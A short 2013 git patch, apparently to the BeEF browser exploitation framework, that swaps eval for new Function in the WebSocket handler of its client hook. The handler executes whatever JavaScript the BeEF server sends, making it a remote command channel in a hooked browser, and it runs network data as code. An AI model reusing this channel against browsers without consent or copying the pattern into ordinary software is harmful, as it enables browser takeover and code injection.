From 713a20f1577b6551a2eb382e5c7780310200f0c1 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 5 Mar 2013 10:37:49 +0000
Subject: [PATCH] Replaced eval with new Function when executing data coming
 from BeEF's WebSocket server.

---
 core/main/client/websocket.js | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 393226c7d..e45a3bc25 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -53,9 +53,10 @@ beef.websocket = {
         };
 
         this.socket.onmessage = function (message) {
-            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
-            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
-            eval(message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
         };
 
         this.socket.onclose = function () {